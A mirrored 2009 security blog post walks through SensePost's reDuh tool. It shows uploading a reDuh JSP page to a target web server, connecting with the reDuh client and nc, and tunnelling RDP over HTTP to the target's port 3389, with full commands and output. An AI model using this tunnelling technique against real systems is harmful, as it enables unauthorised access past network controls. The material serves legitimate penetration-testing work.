More On Using Sensepost's reDuh

(mirrored from carnal0wnage.attackresearch.com)A bit more on sensepost's reDuh sensepost page on it: http://www.sensepost.com/research/reDuh/ reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp[Info]Querying remote web page for usable remote service port[Info]Remote RPC port chosen as 42005[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...[Info]reDuhClient service listener started on local port 1010 Once you are connected to the remote end, in another terminal connect to your local reDuh instance. yomama@c0:~$ nc localhost 1010Welcome to the reDuh command line>>[usage]Commands are of the form [command]{options} Available commands:[usage] - This menu[createTunnel]::[killReDuh] - terminates remote JSP process, and ends this client program[DEBUG] - Sets the verbosity >>[createTunnel]4567:172.16.82.144:3389Successfully bound locally to port 4567. Awaiting connections. In your other shell you should see something similar to this:[Info]Caught new service connection on local port 1010[Info]Successfully bound locally to port 4567. Awaiting connections. Fire up your terminal server client and point it at localhost:4567 [Info]Requesting reDuh to create socket to 172.16.82.144:3389[Info]Successfully created socket 4567:172.16.82.144:3389:1[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)[Info]Caught data with sequenceNumber 0[Info]Localhost 172.16.82.144:3389:1 (386 bytes read from local socket)[Info]Caught data with sequenceNumber 1 If all is working you'll see a shitload of http traffic and eventually your RDP prompt.

(mirrored from carnal0wnage.attackresearch.com)

A bit more on sensepost's reDuh

sensepost page on it: http://www.sensepost.com/research/reDuh/

reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client

yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010

Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity

>>[createTunnel]4567:172.16.82.144:3389
Successfully bound locally to port 4567. Awaiting connections.

In your other shell you should see something similar to this:

[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.

Fire up your terminal server client and point it at localhost:4567

[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port) [Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1

If all is working you'll see a shitload of http traffic and eventually your RDP prompt.



Read Full Article

GSO
Written on Thursday, 15 October 2009 11:31 by GSO

Viewed 83 times so far.
Like this? Tweet it to your followers!

Rate this article

Latest articles from GSO

Latest 'tweets' from GovernmentSecurity

  • News Update: Cyber war is coming, the impact could be huge: CBS News reports that cyber.. http://bit.ly/1tx1kr | #Security Link Monday, 09 November 2009 07:35
  • News Update: Tenable Network #Security Podcast - Episode 11: Welcome to the Tenable Netw.. http://bit.ly/2Iqd6G | Security Link Monday, 09 November 2009 07:35
  • News Update: Consent will be required for cookies in Europe: EDITORIAL: A law that dema.. http://bit.ly/3JYgip | #Security Link Monday, 09 November 2009 07:35
  • News Update: CBS 60 Minutes tackles cyber-terrorism: Could hackers get into the compute.. http://bit.ly/2d5Y21 | #Security Link Monday, 09 November 2009 07:35
  • Blog Update: We have launched the new GovernmentSecurity.org: We decided to launch th.. http://bit.ly/2G1SSF | #Security Link Saturday, 07 November 2009 17:38
blog comments powered by Disqus

Site Search

Disqus Tools